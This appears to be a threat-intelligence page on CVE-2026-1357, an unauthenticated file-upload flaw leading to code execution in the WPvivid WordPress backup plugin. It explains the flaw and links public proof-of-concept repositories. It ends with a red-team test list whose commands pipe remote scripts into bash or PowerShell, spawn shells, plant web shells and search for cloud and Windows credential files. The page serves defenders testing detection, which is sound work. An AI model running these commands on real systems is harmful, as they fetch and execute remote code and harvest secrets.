CVE-2026-1357
Overview
This vulnerability is an unauthenticated arbitrary file upload caused by improper error handling in the RSA decryption process within the WPvivid Backup & Migration plugin. Specifically, failure to terminate execution upon openssl_private_decrypt() failure results in a false value being passed to the phpseclib AES cipher, which treats it as a null-byte key. Additionally, the plugin lacks path sanitization for filenames derived from decrypted payloads, affecting the migration, backup, and staging components handling encrypted session keys and file writes.
Vulnerability Description
The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Upload in versions up to and including 0.9.123. This is due to improper error handling in the RSA decryption process combined with a lack of path sanitization when writing uploaded files. When the plugin fails to decrypt a session key using openssl_private_decrypt(), it does not terminate execution and instead passes the boolean false value to the phpseclib library's AES cipher initialization. The library treats this false value as a string of null bytes, allowing an attacker to encrypt a malicious payload using a predictable null-byte key. Additionally, the plugin accepts filenames from the decrypted payload without sanitization, enabling directory traversal to escape the protected backup directory. This makes it possible for unauthenticated attackers to upload arbitrary PHP files to publicly accessible directories and achieve Remote Code Execution via the wpvivid_action=send_to_site parameter.
Impact
An unauthenticated attacker can upload arbitrary PHP files to publicly accessible directories, enabling remote code execution on the affected WordPress site. No authentication or user interaction is required, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N). Successful exploitation can lead to full system compromise, data theft, or persistent backdoor installation, severely impacting the confidentiality, integrity, and availability of the hosting environment.
Solution
Users should upgrade WPvivid Backup & Migration to a version later than 0.9.123 where this vulnerability is addressed. The Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/e5af0317-ef46-4744-9752-74ce228b5f37) provides detailed patch information. Reviewing the plugin’s cryptographic handling code in the referenced plugin repository commits is recommended to verify the fix. No alternative mitigations are documented; prompt update is advised.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the WPvivid Backup & Migration plugin for WordPress stems from a combination of improper error handling and inadequate path sanitization. Specifically, the flaw occurs during the RSA decryption process, where the failure to properly handle decryption errors allows an attacker to manipulate the decryption flow. When the decryption of a session key fails, the plugin erroneously continues execution by passing a boolean false value to the phpseclib library's AES cipher initialization. This results in the library interpreting the false value as a string of null bytes, which can be exploited to create a predictable null-byte key. Consequently, an attacker can craft a malicious payload that, when decrypted, provides the means to upload arbitrary files without proper validation or sanitization.
Exploitation of this vulnerability can occur through various attack vectors. An unauthenticated attacker can leverage the wpvivid_action=send_to_site parameter to upload malicious PHP files to directories that are publicly accessible. The lack of filename sanitization allows attackers to employ directory traversal techniques, enabling them to escape the intended backup directory and place their payloads in locations where they can be executed. This scenario opens the door to Remote Code Execution (RCE), where an attacker can execute arbitrary code on the server, leading to full system compromise. The ease of exploitation, combined with the lack of authentication requirements, makes this vulnerability particularly dangerous.
The real-world impact of this vulnerability can be severe, especially for businesses relying on the WPvivid Backup & Migration plugin for their WordPress installations. Successful exploitation can lead to unauthorized access to sensitive data, defacement of websites, or even the deployment of malware that can spread to visitors or other connected systems. The potential for data breaches and the subsequent loss of customer trust can result in significant financial repercussions, including regulatory fines and loss of business. Additionally, the operational disruption caused by a successful attack can further exacerbate the financial impact, as businesses may need to invest considerable resources in incident response and recovery efforts.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating the WPvivid Backup & Migration plugin to the latest version is crucial, as developers often release patches to address known vulnerabilities. Implementing a Web Application Firewall (WAF) can help filter out malicious requests and provide an additional layer of security against exploitation attempts. Furthermore, conducting routine security audits and penetration testing can help identify potential weaknesses in the application and its environment. Organizations should also enforce strict file upload policies, ensuring that only trusted file types are accepted and that all uploaded files are scanned for malicious content. By combining these strategies, businesses can significantly reduce their risk exposure and enhance their overall security posture against this and similar vulnerabilities.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-1357, coinciding with the emergence of multiple new proof-of-concept exploits publicly available on GitHub. This expansion in exploit tooling broadens the attack surface by lowering the barrier for threat actors to weaponize the vulnerability, increasing the likelihood of successful unauthenticated arbitrary file uploads. Although the EPSS score has slightly declined, reflecting a modest decrease in overall predicted exploit probability, the surge in detection activity captured by our sensors signals heightened adversary interest and active reconnaissance or exploitation campaigns. This divergence underscores the need for defenders to remain vigilant, as the availability of diverse exploit variants can accelerate attack automation and evasion techniques. Consequently, the threat level associated with CVE-2026-1357 remains critical, with an elevated risk of compromise in environments running vulnerable versions of the WPvivid Backup & Migration plugin.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (9)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
LucasM0ntes/POC-CVE-2026-1357
POC-CVE-2026-1357
|
LucasM0ntes | 13 | 4 | 2026-02-11 | View |
|
halilkirazkaya/CVE-2026-1357
CVE-2026-1357 — WPvivid Backup & Migration ≤ 0.9.123 Unauthenticated RCE Exploit
|
halilkirazkaya | 10 | 2 | 2026-02-13 | View |
|
cybertechajju/CVE-2026-1357-POC
|
cybertechajju | 9 | 2 | 2026-02-14 | View |
|
itsismarcos/Exploit-CVE-2026-1357
Exploit CVE-2026-1357
|
itsismarcos | 1 | 0 | 2026-02-10 | View |
|
Nxploited/CVE-2026-1357
Migration, Backup, Staging <= 0.9.123 - Unauthenticated Arbitrary File Upload
|
Nxploited | 1 | 0 | 2026-03-10 | View |
|
CVEs-Labs/CVE-2026-1357
|
CVEs-Labs | 0 | 0 | 2026-03-02 | View |
|
masterwok/PoC-CVE-2026-1357
Proof-of-concept exploit for POC-CVE-2026-1357. WPvivid Backup & Migration plugin for WordPress <= 0.9.123.
|
masterwok | 0 | 0 | 2026-04-15 | View |
|
rootdirective-sec/CVE-2026-1357-Lab
|
rootdirective-sec | 0 | 0 | 2026-02-25 | View |
|
0xBlackash/CVE-2026-1357
CVE-2026-1357
|
0xBlackash | 0 | 0 | 2026-03-18 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.